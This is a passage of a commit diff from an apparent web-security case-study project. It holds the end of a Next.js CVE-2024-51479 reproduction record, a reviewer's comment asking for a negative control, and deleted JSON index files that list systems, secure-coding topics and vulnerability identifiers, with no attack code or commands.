"kind": "baseline-ok",
"passed": true,
"detail": "baseline URLs responded without 5xx or transport errors"
},
{
"name": "runner-success",
"kind": "runner-success",
"passed": true,
"detail": "server-side authorization recheck was bypassed"
}
]
},
"historical_status": "verified-real",
"latest_status": "verified-real",
"started_at": "2026-03-18T01:29:13+00:00",
"finished_at": "2026-03-18T01:29:17+00:00",
"blocked_reason": null,
"report_refs": {
"bundle_dir": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913",
"report_md": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.md",
"report_html": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/report.html",
"timeline": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-51479-20260318012913/timeline.mmd"
}
}
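Review bot: This record's success detail, "server-side authorization recheck was bypassed", is identical to the gitea CVE-2025-68940 record earlier in this commit, and like that one it has no negative control: nothing shows the target path returning 401/403 without the bypass. The `baseline-ok` assertion only checks for the absence of 5xx and transport errors, so it cannot stand in for that control. I would add a second entry to `attack_steps` (same request without the bypass, expected denial) and have the runner-success detail cite both observations; a record labelled "verified-real" with `"required": false` browser evidence is otherwise resting on a single status code.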


@@ -1,20 +0,0 @@
{
"system_id": "adminer",
"display_name": "Adminer",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/adminer",
"secure_code_topics": [
"xss-output-encoding",
"authz-server-side-recheck"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,22 +0,0 @@
{
"system_id": "adobe-commerce",
"display_name": "Adobe Commerce",
"category": "ecommerce",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/adobe-commerce",
"secure_code_topics": [
"authz-server-side-recheck",
"file-upload-validation",
"xss-output-encoding",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "angular",
"display_name": "Angular",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/angular",
"secure_code_topics": [
"xss-output-encoding",
"template-injection-guard",
"csp-trusted-types"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "apache-httpd",
"display_name": "Apache HTTP Server",
"category": "servers",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/servers/apache-httpd",
"secure_code_topics": [
"request-smuggling-boundary",
"proxy-trust-boundary",
"path-traversal-guard"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "apache-tomcat",
"display_name": "Apache Tomcat",
"category": "servers",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/servers/apache-tomcat",
"secure_code_topics": [
"request-smuggling-boundary",
"authz-server-side-recheck",
"path-traversal-guard"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "aspnet-core",
"display_name": "ASP.NET Core",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/aspnet-core",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,20 +0,0 @@
{
"system_id": "astro",
"display_name": "Astro",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/astro",
"secure_code_topics": [
"authz-server-side-recheck",
"csp-trusted-types"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,20 +0,0 @@
{
"system_id": "caddy",
"display_name": "Caddy",
"category": "servers",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/servers/caddy",
"secure_code_topics": [
"proxy-trust-boundary",
"request-smuggling-boundary"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "directus",
"display_name": "Directus",
"category": "cms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/directus",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "discourse",
"display_name": "Discourse",
"category": "cms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/discourse",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "django",
"display_name": "Django",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/django",
"secure_code_topics": [
"xss-output-encoding",
"path-traversal-guard",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,22 +0,0 @@
{
"system_id": "drupal",
"display_name": "Drupal",
"category": "cms",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/drupal",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"file-upload-validation",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,20 +0,0 @@
{
"system_id": "echo",
"display_name": "Echo",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/echo",
"secure_code_topics": [
"proxy-trust-boundary",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,20 +0,0 @@
{
"system_id": "esbuild",
"display_name": "esbuild",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/esbuild",
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "express",
"display_name": "Express",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/express",
"secure_code_topics": [
"xss-output-encoding",
"ssrf-url-validation",
"proxy-trust-boundary"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "fastify",
"display_name": "Fastify",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/fastify",
"secure_code_topics": [
"proxy-trust-boundary",
"ssrf-url-validation",
"xss-output-encoding"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "flask",
"display_name": "Flask",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/flask",
"secure_code_topics": [
"xss-output-encoding",
"ssrf-url-validation",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "ghost",
"display_name": "Ghost",
"category": "cms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/ghost",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,20 +0,0 @@
{
"system_id": "gin",
"display_name": "Gin",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/gin",
"secure_code_topics": [
"proxy-trust-boundary",
"xss-output-encoding"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,59 +0,0 @@
{
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"tier": "rolling-24m",
"total": 37,
"markdown_cases": 37,
"triage_count": 0,
"latest_update": "2026-03-03T04:57:57.697708Z",
"output_dir": "07-framework-security/platforms/gitea",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 1,
"manual_count": 36,
"items": [
"gitea--CVE-2026-0798",
"gitea--CVE-2026-20736",
"gitea--CVE-2026-20750",
"gitea--CVE-2026-20800",
"gitea--CVE-2026-20883",
"gitea--CVE-2026-20888",
"gitea--CVE-2026-20897",
"gitea--CVE-2026-20904",
"gitea--CVE-2026-20912",
"gitea--CVE-2025-69413",
"gitea--CVE-2025-68938",
"gitea--CVE-2025-68939",
"gitea--CVE-2025-68940",
"gitea--CVE-2025-68941",
"gitea--CVE-2025-68942",
"gitea--CVE-2025-68943",
"gitea--CVE-2025-68944",
"gitea--CVE-2025-68945",
"gitea--CVE-2025-68946",
"gitea--CVE-2022-42968",
"gitea--CVE-2021-45330",
"gitea--CVE-2018-18926",
"gitea--CVE-2020-13246",
"gitea--CVE-2021-28378",
"gitea--CVE-2022-0905",
"gitea--CVE-2022-1928",
"gitea--CVE-2022-27313",
"gitea--CVE-2022-30781",
"gitea--CVE-2021-29134",
"gitea--CVE-2021-45331",
"gitea--CVE-2021-45327",
"gitea--CVE-2022-38795",
"gitea--CVE-2018-15192",
"gitea--CVE-2019-1010261",
"gitea--CVE-2022-38183",
"gitea--CVE-2021-3382",
"gitea--CVE-2022-1058"
]
}


@@ -1,21 +0,0 @@
{
"system_id": "gitlab-ce",
"display_name": "GitLab CE",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/gitlab-ce",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"deserialization-safety"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "grafana",
"display_name": "Grafana",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/grafana",
"secure_code_topics": [
"authz-server-side-recheck",
"plugin-extension-trust-policy",
"xss-output-encoding"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,20 +0,0 @@
{
"system_id": "hapi",
"display_name": "Hapi",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/hapi",
"secure_code_topics": [
"proxy-trust-boundary",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,20 +0,0 @@
{
"system_id": "haproxy",
"display_name": "HAProxy",
"category": "servers",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/servers/haproxy",
"secure_code_topics": [
"proxy-trust-boundary",
"request-smuggling-boundary"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "jenkins",
"display_name": "Jenkins",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/jenkins",
"secure_code_topics": [
"plugin-extension-trust-policy",
"authz-server-side-recheck",
"deserialization-safety"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,22 +0,0 @@
{
"system_id": "joomla",
"display_name": "Joomla",
"category": "cms",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/joomla",
"secure_code_topics": [
"xss-output-encoding",
"file-upload-validation",
"path-traversal-guard",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "kibana",
"display_name": "Kibana",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/kibana",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"proxy-trust-boundary"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,20 +0,0 @@
{
"system_id": "koa",
"display_name": "Koa",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/koa",
"secure_code_topics": [
"proxy-trust-boundary",
"ssrf-url-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "laravel",
"display_name": "Laravel",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/laravel",
"secure_code_topics": [
"xss-output-encoding",
"authz-server-side-recheck",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "magento-open-source",
"display_name": "Magento Open Source",
"category": "ecommerce",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/magento-open-source",
"secure_code_topics": [
"authz-server-side-recheck",
"file-upload-validation",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/mattermost",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "mediawiki",
"display_name": "MediaWiki",
"category": "cms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/mediawiki",
"secure_code_topics": [
"xss-output-encoding",
"authz-server-side-recheck",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,20 +0,0 @@
{
"system_id": "medusa",
"display_name": "Medusa",
"category": "ecommerce",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/medusa",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "moodle",
"display_name": "Moodle",
"category": "cms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/cms/moodle",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "nestjs",
"display_name": "NestJS",
"category": "frameworks",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/nestjs",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"ssrf-url-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,48 +0,0 @@
{
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"tier": "history-full",
"total": 26,
"markdown_cases": 26,
"triage_count": 0,
"latest_update": "2026-03-13T22:14:13.665535Z",
"output_dir": "07-framework-security/frameworks/nextjs",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 26,
"items": [
"nextjs--GHSA-h25m-26qc-wcjf",
"nextjs--CVE-2025-59472",
"nextjs--CVE-2025-59471",
"nextjs--GHSA-5j59-xgg2-r9c4",
"nextjs--GHSA-w37m-7fhw-fmv9",
"nextjs--GHSA-mwv6-3258-q52c",
"nextjs--GHSA-9qr9-h5gf-34mp",
"nextjs--CVE-2025-57752",
"nextjs--CVE-2025-55173",
"nextjs--CVE-2025-57822",
"nextjs--CVE-2025-49826",
"nextjs--CVE-2025-49005",
"nextjs--CVE-2025-48068",
"nextjs--CVE-2025-32421",
"nextjs--CVE-2025-30218",
"nextjs--CVE-2025-29927",
"nextjs--CVE-2024-56332",
"nextjs--CVE-2024-51479",
"nextjs--CVE-2024-47831",
"nextjs--CVE-2024-46982",
"nextjs--CVE-2024-34351",
"nextjs--CVE-2021-43803",
"nextjs--CVE-2021-39178",
"nextjs--CVE-2021-37699",
"nextjs--CVE-2020-15242",
"nextjs--CVE-2020-5284"
]
}


@@ -1,21 +0,0 @@
{
"system_id": "nginx",
"display_name": "Nginx",
"category": "servers",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/servers/nginx",
"secure_code_topics": [
"proxy-trust-boundary",
"request-smuggling-boundary",
"csp-trusted-types"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "nodejs",
"display_name": "Node.js",
"category": "frameworks",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/nodejs",
"secure_code_topics": [
"ssrf-url-validation",
"request-smuggling-boundary",
"dependency-upgrade-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "nuxt",
"display_name": "Nuxt",
"category": "frameworks",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/frameworks/nuxt",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "opencart",
"display_name": "OpenCart",
"category": "ecommerce",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/opencart",
"secure_code_topics": [
"authz-server-side-recheck",
"plugin-extension-trust-policy",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,20 +0,0 @@
{
"system_id": "openmage",
"display_name": "OpenMage / Mage-OS",
"category": "ecommerce",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/openmage",
"secure_code_topics": [
"authz-server-side-recheck",
"plugin-extension-trust-policy"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "phpmyadmin",
"display_name": "phpMyAdmin",
"category": "platforms",
"tier": "rolling-24m",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/platforms/phpmyadmin",
"secure_code_topics": [
"xss-output-encoding",
"authz-server-side-recheck",
"path-traversal-guard"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}


@@ -1,21 +0,0 @@
{
"system_id": "prestashop",
"display_name": "PrestaShop",
"category": "ecommerce",
"tier": "history-full",
"total": 0,
"markdown_cases": 0,
"triage_count": 0,
"latest_update": "",
"output_dir": "07-framework-security/ecommerce/prestashop",
"secure_code_topics": [
"plugin-extension-trust-policy",
"authz-server-side-recheck",
"file-upload-validation"
],
"verified_real": 0,
"verified_synthetic": 0,
"blocked_count": 0,
"manual_count": 0,
"items": []
}
